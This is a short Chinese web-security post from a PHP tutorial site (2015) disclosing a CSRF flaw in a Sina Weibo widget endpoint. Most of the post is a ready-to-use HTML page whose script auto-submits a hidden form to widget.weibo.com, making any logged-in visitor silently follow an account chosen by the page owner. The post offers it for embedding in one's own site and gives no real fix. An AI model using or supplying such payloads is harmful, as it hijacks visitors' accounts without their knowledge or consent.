新浪微博某处CSRF自动加关注漏洞 - 网站安全

新浪微博某处CSRF自动加关注漏洞 - 网站安全 - 自

来源：自学PHP网时间：2015-04-17 11:59 作者：阅读:次

[导读] 在网站框架内嵌入代码，当别人访问你的网站时，不需按关注按钮，即可自动关注你先前设定的账户。htmlbodyform id=imlonghao name=imlonghao action=http://widget.weibo.com/list/aj_attuser.php ......

在网站框架内嵌入代码，当别人访问你的网站时，不需按关注按钮，即可自动关注你先前设定的账户。
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://widget.weibo.com/list/aj_attuser.php" method="post">
<input type="text" name="fuid" value="1791277461" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>

修复方案：
程序员都懂的。

Cookie注入详细介绍 - 网站安全 - 自学php

HTML 5 安全列表 - 网站安全 - 自学php

子栏目

新浪微博某处CSRF自动加关注漏洞 - 网站安全 - 自

最新评论

添加评论

更多文章推荐

添加评论